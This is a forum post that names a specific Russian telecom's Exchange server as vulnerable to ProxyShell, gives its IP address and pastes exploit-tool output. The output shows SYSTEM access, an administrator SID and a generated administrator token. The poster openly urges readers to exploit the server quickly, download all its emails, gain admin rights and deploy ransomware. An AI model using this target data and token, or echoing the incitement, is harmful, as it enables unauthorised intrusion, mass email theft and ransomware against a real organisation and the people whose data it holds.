OP 05 April, 2022 - 09:46 PM
(This post was last modified: 05 April, 2022 - 09:57 PM by SherlockHemredge. Edited 2 times in total.)
So I have recently found https://bigtelecom.ru/ to be vulnerable to ProxyShell. I know right now that a lot of h4x0rs are against Russia, so if anyone viewing this wishes to go further with this target then be my guest. Now it's public, you'll need to be quick before they patch their Exchange server!
From here you could download all their emails, try and get admin to then launch ransomware. It's up to you.
POC: 87.255.0.101
[+] Exchange Backend Servers: ['adfs.bigtelecom.ru']
[+] adfs.bigtelecom.ru - version: 15.2.858.2
[+] adfs.bigtelecom.ru - version_short: Exchange Server 2019
[+] adfs.bigtelecom.ru - user: NT AUTHORITY\СИСТЕМА
[+] adfs.bigtelecom.ru - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 0 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'bigtelecom.ru'}
[+] Attempting to discover SID via 7 builtin email combinations
[+] Retrieved LegacyDN: /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Identified backend SMTP domain: bigtelecom.ru
[+] Attempting to retrieve SID for /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-811240374-227453161-2850703647-500
[-] No emails enumerated - skipping SID discovery via this method
[-] Failed finding SID via user emails
[+] RID Cycled: S-1-5-21-811240374-227453161-2850703647-500
[+] Generated token for [email protected] - S-1-5-21-811240374-227453161-2850703647-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBtBZG1pbmlzdHJhdG9yQGJpZ3RlbGVjb20ucnVVK1MtMS01LTIxLTgxMTI0MDM3NC0yMjc0NTMxNjEtMjg1MDcwMzY0Ny01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox (https://archive.ph/bP5uU)